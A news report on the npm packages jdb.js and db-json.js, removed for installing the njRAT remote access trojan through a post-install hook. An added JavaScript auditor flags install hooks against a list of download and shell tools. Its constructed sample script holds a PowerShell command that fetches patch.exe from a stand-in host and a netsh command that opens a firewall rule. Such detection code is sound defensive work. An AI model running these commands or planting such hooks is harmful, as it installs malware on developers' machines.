The npm repository security team for JavaScript libraries removed two npm packages for containing malicious code that installed a remote access trojan (RAT) on the computers of developers working on JavaScript projects. The two packages, jdb.js and db-json.js, were both created by the same author and described themselves as tools to help developers work with JSON files typically generated by database applications.
Both packages were uploaded to the npm package registry last week and were downloaded more than 100 times before their malicious behaviour was detected by Sonatype, a company that scans package repositories on a regular basis.
According to Sonatype's Ax Sharma, the two packages contained a malicious script that executed after web developers imported and installed either of the two libraries.
The post-install script performed basic reconnaissance of the infected host and then attempted to download and run a file named patch.exe (VT scan) that later installed njRAT, aka Bladabindi, a very popular remote access trojan that has been used in espionage and data theft operations since 2015.
To make sure the njRAT download would be free from any issues, the patch.exe loader also modified the local Windows firewall to add a rule to whitelist its command and control (C&C) server before pinging back its operator and initiating the RAT download, said Sharma.
All of this behaviour was contained only in the jdb.js package, while the second package, db-json.js, loaded the first in an attempt to disguise its malicious behaviour.
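The install-time hook described above is visible in a package's manifest before anything runs, so it can be audited. The following is an added example, not code from Sonatype, npm or the packages in the article: it reads a package.json (and any local script a hook invokes) and flags lifecycle hooks with the download, shell, firewall and executable indicators the article describes; the sample manifest and setup.js are constructed, not the real payload.

```javascript
// Added example, not code from Sonatype, npm or the packages in the article.
// Audits a package.json (plus any local scripts it references) for lifecycle
// hooks that run automatically during `npm install`, the hook jdb.js abused.

const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Indicators typical of install-time droppers: remote fetch, shell spawning,
// firewall changes, or execution of a Windows binary.
const INDICATORS = [
  /\b(curl|wget|Invoke-WebRequest|bitsadmin|certutil)\b/i,
  /\b(powershell|cmd\.exe)\b/i,
  /\bnetsh\b[\s\S]*\bfirewall\b/i,
  /\.exe\b/i,
  /child_process|execSync|spawn\(/,
];

// packageJsonText: manifest contents; files: { filename: contents } for local
// scripts the hooks may call (e.g. "node setup.js"). Returns one finding per hook.
function auditInstallHooks(packageJsonText, files = {}) {
  const pkg = JSON.parse(packageJsonText);
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    if (!(hook in scripts)) continue;
    const command = String(scripts[hook]);
    // Judge "node setup.js" by what setup.js does, not by the one-line command.
    const referenced = Object.keys(files).filter((f) => command.includes(f));
    const body = [command, ...referenced.map((f) => files[f])].join("\n");
    const indicators = INDICATORS.filter((re) => re.test(body)).map(String);
    findings.push({
      package: pkg.name, hook, command, indicators,
      severity: indicators.length ? "high" : "review",
    });
  }
  return findings;
}

// Constructed sample resembling the pattern in the article; not the real payload.
const SAMPLE_MANIFEST = JSON.stringify({
  name: "constructed-json-helper",
  scripts: { postinstall: "node setup.js" },
});
const SAMPLE_FILES = {
  "setup.js":
    'const { execSync } = require("child_process");\n' +
    'execSync("powershell -c Invoke-WebRequest http://example.invalid/patch.exe -OutFile patch.exe");\n' +
    'execSync("netsh advfirewall firewall add rule name=x dir=in action=allow");',
};
console.log(JSON.stringify(auditInstallHooks(SAMPLE_MANIFEST, SAMPLE_FILES), null, 2));
```

A hook marked "review" (for example a native build step) still deserves a look; running `npm install --ignore-scripts` and inspecting findings first avoids executing any hook before it has been read.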
Since infections with any type of RAT-like malware are considered severe incidents, the npm security team, in security alerts issued on Monday, advised web developers who installed either of the two packages to consider their systems fully compromised.
"Any computer that has this package installed or running should be considered fully compromised," the npm team said.
"All secrets and keys stored on that computer should be rotated immediately from a different computer.
"The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it," they also added.